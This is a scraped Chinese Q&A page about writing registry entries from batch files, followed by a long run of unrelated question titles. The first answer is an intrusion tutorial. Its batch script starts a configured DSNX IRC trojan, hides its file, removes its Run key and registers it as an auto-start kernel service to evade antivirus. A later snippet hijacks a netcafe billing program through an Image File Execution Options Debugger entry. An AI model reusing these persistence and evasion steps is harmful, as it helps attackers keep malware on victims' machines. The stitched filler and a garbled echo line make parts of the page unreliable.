问答文章1 问答文章501 问答文章1001 问答文章1501 问答文章2001 问答文章2501 问答文章3001 问答文章3501 问答文章4001 问答文章4501 问答文章5001 问答文章5501 问答文章6001 问答文章6501 问答文章7001 问答文章7501 问答文章8001 问答文章8501 问答文章9001 问答文章9501

批处理中,如何将一段信息导入注册表

发布网友 发布时间:2023-12-05 04:29

我来回答

3个回答

热心网友 时间:2024-10-20 09:07

在入侵过程中经常回操作注册表的特定的键值来实现一定的目的,例如:为了达到隐藏后门、木马程序而删除Run下残余的键值。或者创建一个服务用以加载后门。当然我们也会修改注册表来加固系统或者改变系统的某个属性,这些都需要我们对注册表操作有一定的了解。下面我们就先学习一下如何使用.REG文件来操作注册表.(我们可以用批处理来生成一个REG文件)
关于注册表的操作,常见的是创建、修改、删除。

1.创建
创建分为两种,一种是创建子项(Subkey)

我们创建一个文件,内容如下:

Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE/SOFTWARE/Microsoft/hacker]

然后执行该脚本,你就已经在HKEY_LOCAL_MACHINE/SOFTWARE/Microsoft下创建了一个名字为“hacker”的子项。

另一种是创建一个项目名称
那这种文件格式就是典型的文件格式,和你从注册表中导出的文件格式一致,内容如下:

Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE/SOFTWARE/Microsoft/Windows/CurrentVersion/Run]
"Invader"="Ex4rch"
"Door"=C://WINNT//system32//door.exe
"Autodos"=dword:02

这样就在[HKEY_LOCAL_MACHINE/SOFTWARE/Microsoft/Windows/CurrentVersion/Run]下
新建了:Invader、door、about这三个项目
Invader的类型是“String Value”
door的类型是“REG SZ Value”
Autodos的类型是“DWORD Value”

2.修改
修改相对来说比较简单,只要把你需要修改的项目导出,然后用记事本进行修改,然后导入(regedit /s)即可。

3.删除
我们首先来说说删除一个项目名称,我们创建一个如下的文件:

Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE/SOFTWARE/Microsoft/Windows/CurrentVersion/Run]
"Ex4rch"=-

执行该脚本,[HKEY_LOCAL_MACHINE/SOFTWARE/Microsoft/Windows/CurrentVersion/Run]下的"Ex4rch"就被删除了;

我们再看看删除一个子项,我们创建一个如下的脚本:

Windows Registry Editor Version 5.00

[-HKEY_LOCAL_MACHINE/SOFTWARE/Microsoft/Windows/CurrentVersion/Run]

执行该脚本,[HKEY_LOCAL_MACHINE/SOFTWARE/Microsoft/Windows/CurrentVersion/Run]就已经被删除了。

相信看到这里,.reg文件你基本已经掌握了。那么现在的目标就是用批处理来创建特定内容的.reg文件了,记得我们前面说道的利用重定向符号可以很容易地创建特定类型的文件。

samlpe1:如上面的那个例子,如想生成如下注册表文件
Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE/SOFTWARE/Microsoft/Windows/CurrentVersion/Run]
"Invader"="Ex4rch"
"door"=hex:255
"Autodos"=dword:000000128
只需要这样:
@echo Windows Registry Editor Version 5.00>>Sample.reg

@echo [HKEY_LOCAL_MACHINE/SOFTWARE/Microsoft/Windows/CurrentVersion/Run]>Sample.reg
@echo "Invader"="Ex4rch">>Sample.reg
@echo "door"=5>>C://WINNT//system32//door.exe>>Sample.reg
@echo "Autodos"=dword:02>>Sample.reg

samlpe2:
我们现在在使用一些比较老的木马时,可能会在注册表的[HKEY_LOCAL_MACHINE/SOFTWARE/Microsoft/Windows/CurrentVersion/Run(Runonce、Runservices、Runexec)]下生成一个键值用来实现木马的自启动.但是这样很容易暴露木马程序的路径,从而导致木马被查杀,相对地若是将木马程序注册为系统服务则相对安全一些.下面以配置好地IRC木马DSNX为例(名为windrv32.exe)
@start windrv32.exe
@attrib +h +r windrv32.exe
@echo [HKEY_LOCAL_MACHINE/SOFTWARE/Microsoft/Windows/CurrentVersion/Run] >>patch.dll
@echo "windsnx "=- >>patch.dll
@sc.exe create Windriversrv type= kernel start= auto displayname= WindowsDriver binpath= c:/winnt/system32/windrv32.exe
@regedit /s patch.dll
@delete patch.dll

@REM [删除DSNXDE在注册表中的启动项,用sc.exe将之注册为系统关键性服务的同时将其属性设为隐藏和只读,并config为自启动]
@REM 这样不是更安全^_^.

热心网友 时间:2024-10-20 09:07

把下面的代码copy到任意文件名.bat.运行.分拿来
@echo off

reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v tvb /t REG_EXPAND_SZ /d %d:\\tvb.txt% /f >nul

热心网友 时间:2024-10-20 09:08

@echo off
reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "tvb" /d "d:\tvb.txt" /t REG_SZ /f
批处理中,如何将一段信息导入注册表

delete patch.dll REM [删除DSNXDE在注册表中的启动项,用sc.exe将之注册为系统关键性服务的同时将其属性设为隐藏和只读,并config为自启动]REM 这样不是更安全^_^.

利用批处理如何将*.reg导进注册表中?

双击就可以导入了、或通过“DOS”命令提示符键入“Regedit -s C:、1.reg”。

怎样用批处理导入注册表文件

把你的1.reg你的内容按上面的格式写入一个批处理中 注意最后/f就是不提示确认的 别掉了

如何用批处理导入这个注册表?

把单独的放在一个文件中如 1.reg 然后在bat里用一句话 就够了:reg import 1.reg//注意路径哦

如何使用批处理导入注册表

reg add命令和注册表项文件格式不一样,只能保存为文件然后用命令导入.regedit /s reg文件名 或者 reg import reg文件名

批处理写入注册表?

第一行的内容如下:dir /b 您的Shutdown 文件夹的路径 注意:如果路径中含有空格或者长文件名,需要用引号括起来。接下来是一个空格和一个大于号“>”,然后敲入拟保存这个批处理文件的路径,最后是这个批处理文件的名字。要找到文件路径,只需在浏览器里打开该文件夹,地址栏里显示的就是路径。如果...

批处理导入注册表

/s "1.reg"还有要在你的注册表文件开头加上 Windows Registry Editor Version 5.00 如果你只想用批处理命令也可以:reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Pubwin2008全能破解王.exe" /f /v Debugger /d "1"以上代码同一行 ...

请问这条命令怎么用批处理导入注册表???

复制哈,用txt保存了,然后把txt改为bat批处理文件,运行就行了。我也没有这么试验,不知道到底行不行,也没胆量试验下。如果你要导入注册表的是[HKEY_CLASSES_ROOT\CLSID\{871C5380-42A0-1069-A2EA-08002B30309D}\shell\OpenHomePage\Command],那很简单保存下,把后缀名改为reg的,然后在运行里...

如何用批处理文件把程序写入注册表?

reg add "注册表中的路径“例如:REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v 修改IP /t REG_SZ /d "%~dp0自动修改IP.bat" /f 他它的意思就是在注册表HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run 中增加一个“修改IP”的项目,其值为“...

能否批处理导入注册表内容

把你要导入的内容,保存为reg注册表文件,假设名为SID.REG 然后利用reg import SID.REG命令导入即可。

批处理导入注册表 批处理执行导入注册表 批处理清理注册表 批处理添加注册表 批处理写注册表 批处理打开注册表项 批处理获取注册表的值 批处理删除注册表键值 批处理删除注册表项
声明声明:本网页内容为用户发布,旨在传播知识,不代表本网认同其观点,若有侵权等问题请及时与本网联系,我们将在第一时间删除处理。E-MAIL:11247931@qq.com
求好看的重生文,不要重生回到以前的,女主性格不能软弱无能,不能太... 求双洁的娱乐圈小说(男女主或攻受一定要都身心干净,并且要重生的 )可 ... ...文笔一定要好 重生娱乐圈什么的都无所谓 一定要是婚后的! 浙江高考成绩理科专科排名查询怎么查啊,最好给网站谢谢 各高校是怎么依照高考成绩录取 四不像是什么样的动物 孔家后人为什么要把“四不像”刻在孔府内的照壁上? 中国龙和外国龙的区别西方龙的区别 山东省烟台市高新技术产业开发区的车牌号是什么? 电脑重装系统按个键-(电脑重装系统按个键没反应) 女孩子知道我追她故意说大年龄,还说大了我九岁,她是什么心态? 一年内第二次修改技巧 怎么分辨变蛋真假9 请问环球有什么用?能当信用卡使用吗?还是我被骗了? ...女主角凌洛喜欢谁?男主角是谁?凌洛最后是跟轩辕煜在一起的吗?_百度... 天通苑哪家理发店手艺好啊?4 天通苑那家美发店造型好啊? 小蝌蚪变成青蛙的过程是怎样的?123 黎明觉醒每日委托在哪 杭州火车东站到汽车西站有直达车或者地铁么? 一个身份证可以绑定几个? 鼓浪屿的珍珠是真的吗?值得买吗 链人app是不是骗局? 使用过程中需要实名认证,身份证件照,...134 皮蛋有什么造假事件?7 一本书有500页共有500个错每个错误都等可能出现在每一页上求,在第100... 职业病危害现状评价的依据是什么13 职业病危害控制效果评价多久做一次,政府部门说3年做一次,有哪...16 鞭尸是什么意思?192 企业职业病危害现状评价是国家强制要做的吗? 什么是职业病危害现状评价10 小蝌蚪变成青蛙后 为什么会掉尾巴?55 喉咙长期有痰但不咳嗽怎么办?4 比特派钱包助记词可以修改吗 论坛中鞭尸是什么意思16 鞭尸是什么意思?5 大腿内侧很黑怎么美白21 一部手机怎么登录两个? 松花蛋是什么样子的?2 如何操作网上照相社保认证照片?42 本人开了个黑吧…五台电脑…如何实现共享和游戏更新同步? 局域网中一台机器A共享文档,怎样设置权限,让特定的机器B允许...1 花草种植方法及注意事项有哪些5 集体供暖能单独关你家暖气吗 快要毕业了,食堂的菜依旧难吃,想写两句诗讽刺下,但不学无术啊,只写了... 这是谁啊?是明星吗?不认识 怎么利用批处理或导入注册表,添加启动项 赵信的秘密特工皮肤有特效吗195 请问儿科护理论文怎么写,以“小儿哮喘持续状态的护理体会”为题...1 一个手机怎么登两个 市场上小变蛋有假的吗1